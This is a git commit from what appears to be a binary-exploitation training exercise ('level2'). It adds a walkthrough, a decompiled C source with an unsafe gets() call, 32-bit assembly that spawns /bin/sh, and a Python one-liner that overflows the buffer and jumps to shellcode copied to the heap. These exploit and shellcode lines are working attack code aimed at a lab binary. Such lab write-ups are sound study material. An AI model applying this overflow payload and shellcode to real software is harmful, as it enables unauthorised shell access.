level2 done

2025-04-28 17:09:58 +02:00 · 2025-04-28 17:09:58 +02:00 · 291c839668
commit 291c839668
parent 9e787cb6b9
4 changed files with 43 additions and 2 deletions
--- a/level2/ressources/exploit
+++ b/level2/ressources/exploit
@ -0,0 +1 @@
+(python -c 'print "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\xb0\x0b\xcd\x80" + "A" * 55 + "\x08\xa0\x04\x08"' ; cat) | ./level2
--- a/level2/ressources/linux_shell.s
+++ b/level2/ressources/linux_shell.s
@ -0,0 +1,25 @@
+; run /bin/sh and normal exit
+; author @cocomelonc
+; nasm -f elf32 -o example3.o example3.asm
+; ld -m elf_i386 -o example3 example3.o && ./example3
+; 32-bit linux
+
+section .bss
+
+section .text
+  global _start   ; must be declared for linker
+
+_start:           ; linker entry point
+
+  ; xoring anything with itself clears itself:
+  xor eax, eax    ; zero out eax
+  xor ebx, ebx    ; zero out ebx
+  xor ecx, ecx    ; zero out ecx
+  xor edx, edx    ; zero out edx
+
+  push eax        ; string terminator
+  push 0x68732f6e ; "hs/n"
+  push 0x69622f2f ; "ib//"
+  mov ebx, esp    ; "//bin/sh",0 pointer is ESP
+  mov al, 0xb     ; mov eax, 11: execve
+  int 0x80        ; syscall
--- a/level2/source.c
+++ b/level2/source.c
@ -9,8 +9,10 @@ static void p(void)

 	fflush(stdout);
 	gets(buf);
+	if ((uwu & 0xb0000000) == 0xb0000000) {
 		printf("(%p\n)", uwu);
 		exit(1);
+	}
 	puts(buf);
 	strdup(buf);
 	return;
--- a/level2/walkthrough
+++ b/level2/walkthrough
@ -0,0 +1,13 @@
+# Level2
+
+Using ghidra, we can decompile the code and see that it fills a buffer of 76 bytes using the deprecated (unsafe) function `gets`.
+Then, it will check if the return address hasn't been overwritten to and thus prevent us to exploit this vulnerability...
+Since it calls `strdup` at the end of the program, we can insert a piece of code executing a linux shell through asm instructions. This will be copied to the heap, and since the ASLR is disabled, the address of where `strdup` will copy the content of the buffer will always be the same (we can find it using `ltrace ./binary`).
+
+For the payload, everything is explained here (thanks cocomelonc UwU):
+https://cocomelonc.github.io/tutorial/2021/10/09/linux-shellcoding-1.html
+
+We can then execute this command (similar to the previous one):
+`(python -c 'print "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\xb0\x0b\xcd\x80" + "A" * 55 + "\x08\xa0\x04\x08"' ; cat) | ./level2`
+Where we copy our linux shell code to the heap, then fill the buffer until after `eip`.
+Finally, we can insert the address where our code has been copied so it will be executed when the `return` instruction is called.
				`@ -0,0 +1 @@`
				`(python -c 'print "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\xb0\x0b\xcd\x80" + "A" * 55 + "\x08\xa0\x04\x08"' ; cat) \| ./level2`